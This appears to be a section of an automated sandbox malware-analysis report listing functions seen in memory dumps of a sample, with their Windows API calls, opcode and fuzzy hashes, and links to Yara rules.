                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f7d8c3c5045f76c38d0133d97a2924ea36f8107a87f0929c553b15eee5fad050
                                                • Instruction ID: dd2aa48a0823f98e22567426080b751d3ccf6fd31fbc914e04dd43b9309784e1
                                                • Opcode Fuzzy Hash: f7d8c3c5045f76c38d0133d97a2924ea36f8107a87f0929c553b15eee5fad050
                                                • Instruction Fuzzy Hash: E832F6B4A44228CFCB64AF74C89879DB7B6BB88305F2044EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46F47, Relevance: 2.0, APIs: 1, Instructions: 484libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eef237ea9331a70ae649c4ad348807e474af2c3215904e39a2d15b61b65cce5f
                                                • Instruction ID: 3bab297d895dcebcb1b20962ca0e739e243fc9de4e755f34b60c1b4d7f7f2ba6
                                                • Opcode Fuzzy Hash: eef237ea9331a70ae649c4ad348807e474af2c3215904e39a2d15b61b65cce5f
                                                • Instruction Fuzzy Hash: FF32F7B4A44228CFCB64AF74C89879DB7B6BB88305F2044EAD54AA3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46F8E, Relevance: 2.0, APIs: 1, Instructions: 477libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 335df828309db026dd65d16ef05bd006ce2228ce83161c3dc43d77283ae7764c
                                                • Instruction ID: db0cd0877f2237d1eea442da79a07d3c606f5c9d2f818159accc0a7f6359d071
                                                • Opcode Fuzzy Hash: 335df828309db026dd65d16ef05bd006ce2228ce83161c3dc43d77283ae7764c
                                                • Instruction Fuzzy Hash: 3B2207B4A44228CFCB64AF74C89879DB7B6BB88305F2044EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46FD5, Relevance: 2.0, APIs: 1, Instructions: 468libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6bc4a4fe52bf96863f6433bd448e02b5a12c26d93ecf05ee446c92f306c72883
                                                • Instruction ID: 2f8bbc9460f6f83e0b21d02377f7e1551cdb0a7f6b652d026a687c599011bbc9
                                                • Opcode Fuzzy Hash: 6bc4a4fe52bf96863f6433bd448e02b5a12c26d93ecf05ee446c92f306c72883
                                                • Instruction Fuzzy Hash: D322F7B4A44228CFCB64AF74C89879DB7B6BB88305F2044EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E47013, Relevance: 2.0, APIs: 1, Instructions: 463libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 90a619dbecbacc3999b59a004042628f30c44ff0b3c2ac51353f6fb786fbb6d3
                                                • Instruction ID: 13401aed723fe354ddbdcfa9dc86fdf586797f6a13e4a98147499026381c5f51
                                                • Opcode Fuzzy Hash: 90a619dbecbacc3999b59a004042628f30c44ff0b3c2ac51353f6fb786fbb6d3
                                                • Instruction Fuzzy Hash: 8522F7B4A44228CFCB64AF74C89879DB7B2BB88305F6044EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E4705A, Relevance: 2.0, APIs: 1, Instructions: 456libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14705c4a153db926000f61885039088f37052fa7ab8b683f23fa3a23e62d93b6
                                                • Instruction ID: 7238f2aed69a63153cc13725fa445be84975bf68f17425495aa07938ba7b8401
                                                • Opcode Fuzzy Hash: 14705c4a153db926000f61885039088f37052fa7ab8b683f23fa3a23e62d93b6
                                                • Instruction Fuzzy Hash: CB22F8B4A44228CFCB64AF74C89879DB7B2BB88305F2045EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E470A1, Relevance: 1.9, APIs: 1, Instructions: 449libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ebe2defa199f9c9abceb50f6d0dc10f4eee87676defa7513c7052692abd053e6
                                                • Instruction ID: 54550470a654acd8f6db6f8ac43f932aa0a9b3840aea41a1f78d95b3aab681d0
                                                • Opcode Fuzzy Hash: ebe2defa199f9c9abceb50f6d0dc10f4eee87676defa7513c7052692abd053e6
                                                • Instruction Fuzzy Hash: 1722F8B4A44228CFCB64AF74C89879DB7B2BB88305F2045EAD54AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115AA10, Relevance: 1.7, APIs: 1, Instructions: 208libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0b3e6ac58970d82481d3678af8933f70b65ec9f37b1d017c8880db3a59fe495c
                                                • Instruction ID: 8aa91e08ef4e3bc30fdc417378846ddb72f9f40ccf28a3689e927c651de19685
                                                • Opcode Fuzzy Hash: 0b3e6ac58970d82481d3678af8933f70b65ec9f37b1d017c8880db3a59fe495c
                                                • Instruction Fuzzy Hash: AA71D434B04219DFDB18DBB4D8987AE7BF2AF84344F118529E912E7390DF78A845CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115F828, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0ff2698b0457df402f65e6eae127ee4ac84464b505a2da77f54e98c60e53a814
                                                • Instruction ID: 25584d20cca691ca2031235af5764bac6ca05f95f0fbf297ce12540d31f5ca3d
                                                • Opcode Fuzzy Hash: 0ff2698b0457df402f65e6eae127ee4ac84464b505a2da77f54e98c60e53a814
                                                • Instruction Fuzzy Hash: DA51C975B002059FCB08EFB4C894AAEB7F6AF85204F15896AE512DB391EF70ED05C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115F81B, Relevance: 1.6, APIs: 1, Instructions: 142libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0ae2ea226cca860a1f4b98ef836917bf53b3d740663a2e93ff838137cb2c5ff2
                                                • Instruction ID: 6ecead1748422d5776ef72454622ec7f34dec82f896999d371da9347dab02e86
                                                • Opcode Fuzzy Hash: 0ae2ea226cca860a1f4b98ef836917bf53b3d740663a2e93ff838137cb2c5ff2
                                                • Instruction Fuzzy Hash: 9A51D631B002059FCB08DFB4C894AEE77F6AF84204F15896AE512DB391EF70E906CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39A120, Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8df3e3dd4535d734c145d8e4f6f83ae6ad0ec299309e3045dd9ad7e49ad4065
                                                • Instruction ID: 8295339d64ca435cfb69658e13746bac0c3dd199d670d92abaf07dc27ef8a73f
                                                • Opcode Fuzzy Hash: f8df3e3dd4535d734c145d8e4f6f83ae6ad0ec299309e3045dd9ad7e49ad4065
                                                • Instruction Fuzzy Hash: 4241E431E083598FCB04DFB5D4442AEBBF1AF89310F05866AD504E7251DB789846CBE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F0C099, Relevance: 1.6, APIs: 1, Instructions: 124threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TerminateThread.KERNEL32(-E2990A48,38A59504), ref: 00F0C0F8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629068599.0000000000F0C000.00000040.00000001.sdmp, Offset: 00F0C000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 99c0b5f8df7ec35d339eb18f4e84ccb649eed4baab38286ed01ee40e9c9f2ae2
                                                • Instruction ID: 4529c1498e1c3378eb80d6ffdd7fb997253e902fd0c7fee9e79d71064dbfcb23
                                                • Opcode Fuzzy Hash: 99c0b5f8df7ec35d339eb18f4e84ccb649eed4baab38286ed01ee40e9c9f2ae2
                                                • Instruction Fuzzy Hash: 78417B62B147868BC312D624CC41BDA77928BABA70B548744D5E5CB3F6E7218C03A7D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011CA040, Relevance: 1.6, APIs: 1, Instructions: 115registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 011CA149
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                • Opcode ID: 71a75f077f761418b091ba3ab23ddd7614eb0627a0234a0532868d9f11a1fc23
                                                • Instruction ID: 7e598147ad3b140263babfd6af66b34c245e7dc574904fa5ecfea7c3877ad6d9
                                                • Opcode Fuzzy Hash: 71a75f077f761418b091ba3ab23ddd7614eb0627a0234a0532868d9f11a1fc23
                                                • Instruction Fuzzy Hash: 064148B0E002589FCB15CFA9D884ADEFFF5AF88744F15802AE918AB350D774A945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C9D88, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 011C9E8C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: c68f388de6453c2993afce6ffc3d7f9a2e2257a3974f7727c67d8d996ec067f3
                                                • Instruction ID: e27542db6039bedc3b814ced1d4dafadbf4b0a395806ff73ac8ac804324eb3fa
                                                • Opcode Fuzzy Hash: c68f388de6453c2993afce6ffc3d7f9a2e2257a3974f7727c67d8d996ec067f3
                                                • Instruction Fuzzy Hash: F24142B0E043498FDB14CFA9C184A9EFBF1AF48708F29816EE409AB345C7749945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C96B8, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 011CA149
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                • Opcode ID: 16c534de6c94588aed79ff60744354148b1a845f821ff360788c282f8801e244
                                                • Instruction ID: 273f5b1668b82f8e248ca46e7ba67417e909275c40e3f9f1e81fa3452835a6b6
                                                • Opcode Fuzzy Hash: 16c534de6c94588aed79ff60744354148b1a845f821ff360788c282f8801e244
                                                • Instruction Fuzzy Hash: 5D31E2B5D0025C9FCB15CFA9D984ADEFBF5AF88740F15802AE919AB310D770A905CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C6C34, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 011C9E8C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: d21a879f5d141f36bfdb40533089b501ffe8c390c091f98e8fdc7421b4180f90
                                                • Instruction ID: fe40926d498d73791541b9813f343cb666ecf64b01e4f8fa125014b0d17e4ce4
                                                • Opcode Fuzzy Hash: d21a879f5d141f36bfdb40533089b501ffe8c390c091f98e8fdc7421b4180f90
                                                • Instruction Fuzzy Hash: 3931FEB0D042489FDB14CF99C584A8EFBF1BF58708F29816EE909AB301C7759985CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F0C010, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TerminateThread.KERNEL32(-E2990A48,38A59504), ref: 00F0C0F8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629068599.0000000000F0C000.00000040.00000001.sdmp, Offset: 00F0C000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 2a96e31492f442fa0f560ce243fe863f353602cce699db9720f26de0c25edd7d
                                                • Instruction ID: fdf658276ab00949186fce6a1b17959c88edf143314a6216f57c47401407e9dd
                                                • Opcode Fuzzy Hash: 2a96e31492f442fa0f560ce243fe863f353602cce699db9720f26de0c25edd7d
                                                • Instruction Fuzzy Hash: E121277A5043868BDB61CF29C9807DB77F3AFD1390F258156CD889F265E3358A02AB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39F969, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(00000000,00000000), ref: 1D39F9E6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID: FindWindow
                                                • String ID:
                                                • API String ID: 134000473-0
                                                • Opcode ID: 6339ab6abdd08649014a72742e957ceeb1985703e62d0f511bcaa7ec8596edbf
                                                • Instruction ID: e781263ea3bebd928121db734c6afdd0747d4b185a63e3756dcc8f7e4dd31082
                                                • Opcode Fuzzy Hash: 6339ab6abdd08649014a72742e957ceeb1985703e62d0f511bcaa7ec8596edbf
                                                • Instruction Fuzzy Hash: B52110B6C002099ECB14CFAAD881BEEFBB4FF49310F10852ED45AB7600C775A544CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39DD30, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(00000000,00000000), ref: 1D39F9E6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID: FindWindow
                                                • String ID:
                                                • API String ID: 134000473-0
                                                • Opcode ID: 271d3e57f987783fbf9d1a465e4c6cea29a557d7da29c54dca3dcdb9026d707f
                                                • Instruction ID: 36268aafe4b4d0b9c32be56d6c8ebe014370b3c825df84263c3a6b2b99c42864
                                                • Opcode Fuzzy Hash: 271d3e57f987783fbf9d1a465e4c6cea29a557d7da29c54dca3dcdb9026d707f
                                                • Instruction Fuzzy Hash: 4C2110B6D002099FCB14CFAAC884AEEFBB4FB49310F10852ED459B7200C774A944CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D398AEC, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,1D39A172), ref: 1D39A25F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: aaccc75f04ad403f1cf4da482d45735391747384eb2d6e30d039dfb46411e08f
                                                • Instruction ID: 6e2eeb6dc61b84c23ad9378f60e8ebea1038121b60883e815572caeb3bf1b889
                                                • Opcode Fuzzy Hash: aaccc75f04ad403f1cf4da482d45735391747384eb2d6e30d039dfb46411e08f
                                                • Instruction Fuzzy Hash: 571122B1C046199BCB00CFAAC4447EEFBB4AF48710F01822AD914B7200D778A955CFE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39A1F0, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,1D39A172), ref: 1D39A25F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 8ed750c0cae8ebf1778becc2eb6f9b8fcd29c53d22d7c201d4ede1ff0477667c
                                                • Instruction ID: b9b42c24c4ff7b879200698bd1d07337c1c09830de537feeafa57e425487f851
                                                • Opcode Fuzzy Hash: 8ed750c0cae8ebf1778becc2eb6f9b8fcd29c53d22d7c201d4ede1ff0477667c
                                                • Instruction Fuzzy Hash: 901133B5C002199FCB00CFAAC444BEEFBB4AF48720F11822AD914B7240D778A945CFE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E52BB0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00E52B91,00000800), ref: 00E52C22
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 9c396ed3f3fa3832018143beaf7e3a62b23484ddf60a351693a48dd34cf7cbb9
                                                • Instruction ID: be333996c4720bd6c35caf2c499aacfd1ac0d76db58bd5c497c01c13973f4d9a
                                                • Opcode Fuzzy Hash: 9c396ed3f3fa3832018143beaf7e3a62b23484ddf60a351693a48dd34cf7cbb9
                                                • Instruction Fuzzy Hash: 382103B5D002088FCB10CFA9D484AEEFBF4AF89314F15882ED955B7201C374A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E568A8, Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00E56905
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 2d561a6470450bab396bf70c411f34ae659bd183d7f480651037283a296148b8
                                                • Instruction ID: 7d779058d7563df795ca9f33425011328b7b2b87477e526f596d61cc8fdadb28
                                                • Opcode Fuzzy Hash: 2d561a6470450bab396bf70c411f34ae659bd183d7f480651037283a296148b8
                                                • Instruction Fuzzy Hash: 081106B59006488FCB10DFA9D445BDEFBF4AF88324F24881AD918B7311C374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E559F8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00E56905
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 2d02cb3483083b0fbced9252b4e1b2aeef1e8f5250533a31726519791627415b
                                                • Instruction ID: b5ee240dadfd6160ee1dc91c266bdde09787c4214ab68206615ad6da2daab711
                                                • Opcode Fuzzy Hash: 2d02cb3483083b0fbced9252b4e1b2aeef1e8f5250533a31726519791627415b
                                                • Instruction Fuzzy Hash: 461118B49042488FCB10CF99C444BDEFBF4EB88324F14841AD918B7311C374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 01151D28, Relevance: 4.5, Strings: 3, Instructions: 727COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Xk$Xk$Xk
                                                • API String ID: 0-4150077657
                                                • Opcode ID: d8c6a2fda0e9dcb0b65a0cf01210401f899e68313d052bd798be336f6550440b
                                                • Instruction ID: 53bc3b4c80948266ad0d547cf42868cbea0d538c9c4438081e1600dbbc7acef5
                                                • Opcode Fuzzy Hash: d8c6a2fda0e9dcb0b65a0cf01210401f899e68313d052bd798be336f6550440b
                                                • Instruction Fuzzy Hash: CC526FF3D143248FC7DA8F658D085683671FBA52303CA47AED8868A256FE75E8098F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01156518, Relevance: 2.4, Strings: 1, Instructions: 1129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Hk
                                                • API String ID: 0-2725002668
                                                • Opcode ID: 502cdb8f3d440e67b60595535661d9cd854f72caa368dac1abc5daeb96764d9a
                                                • Instruction ID: 0335c1275ce291af38f48934ac0a1cc53ed7af46497990a06ea5640a8cc31f31
                                                • Opcode Fuzzy Hash: 502cdb8f3d440e67b60595535661d9cd854f72caa368dac1abc5daeb96764d9a
                                                • Instruction Fuzzy Hash: 60A28D34A00204CFCB68DBA8C4986ADB7F2EF85314F91896AD815DB3A1DB75DC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39A510, Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Xk
                                                • API String ID: 0-3738635399
                                                • Opcode ID: cb1ca767d34ee1316e36f126bc6dd1bbcf771c12d5d3ac8c424d3093ca6fec9b
                                                • Instruction ID: f1fcd370f9a24ec8bab60f15d1541663c3109bdffff3d12ca2073f4109637ae8
                                                • Opcode Fuzzy Hash: cb1ca767d34ee1316e36f126bc6dd1bbcf771c12d5d3ac8c424d3093ca6fec9b
                                                • Instruction Fuzzy Hash: 5FC1A770B0822DCBCF1C4F7584452BE7AB6BFC9795F168629D482EA284DF348843D766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C89B8, Relevance: .7, Instructions: 676COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 249f4b5a0aebf41f0f46dfac9d0044d9560088936cb1256578675d1f9257a76d
                                                • Instruction ID: 5dc62394a893d1a83ee12e8c143bd2af837f0052513a731b77eac2acf610a7a2
                                                • Opcode Fuzzy Hash: 249f4b5a0aebf41f0f46dfac9d0044d9560088936cb1256578675d1f9257a76d
                                                • Instruction Fuzzy Hash: F442B274B042188FDB18DBB8C8947AEB7B2AF95704F1584A9E509DB391DF34EC41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115B710, Relevance: .3, Instructions: 271COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21b2c0e3811ed5f361e67d30056918d937a206127805af85b69705efc1d1c0cb
                                                • Instruction ID: 317451c8e1833ac988a054c827341065fd04730e51928a1cfdd0eab39be069c3
                                                • Opcode Fuzzy Hash: 21b2c0e3811ed5f361e67d30056918d937a206127805af85b69705efc1d1c0cb
                                                • Instruction Fuzzy Hash: A4914774B042149FDB58DB78C8547AE7AF3AFC4744F118829EA16DB390DF78AC0287A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E50890, Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f17725ce9d9042f949392e66015aee27664d179fd3677bba63fd6b2c67e8b83c
                                                • Instruction ID: 0f82abf8b6c172a863d0a964ef202298dd9d15c59fe65d544124b023a7970d85
                                                • Opcode Fuzzy Hash: f17725ce9d9042f949392e66015aee27664d179fd3677bba63fd6b2c67e8b83c
                                                • Instruction Fuzzy Hash: 34A16E32A002198FCF15DFB4C8445DEB7F2BF85305B15996AEC06BB266DB31E949CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E43708, Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f4de3c1d7bcebdd454e4282a9b3402aa0329ad6619f1b8a4a5b7383c1441723
                                                • Instruction ID: 06477358418a493f60e9c3bdef9f14050f05c718883c92f4662e8c8aab4b0497
                                                • Opcode Fuzzy Hash: 0f4de3c1d7bcebdd454e4282a9b3402aa0329ad6619f1b8a4a5b7383c1441723
                                                • Instruction Fuzzy Hash: 4F915C70E002099FDB14CFA9E8857DEBBF2AF88718F149129E405B7394DB749A45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C7E48, Relevance: .2, Instructions: 235COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2638322e9635d1ed1f1f442bb199827daf52303d87c2e7ab42a6698727817a7
                                                • Instruction ID: 270130b3bf1fe2dc2a50078a70b1cae562b47688dfca322fd34856d0ac2dab6f
                                                • Opcode Fuzzy Hash: a2638322e9635d1ed1f1f442bb199827daf52303d87c2e7ab42a6698727817a7
                                                • Instruction Fuzzy Hash: 88915E71D002498FDF29CF9DC8806AEBBB1FB99710F15882AE514E7292D775D850CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%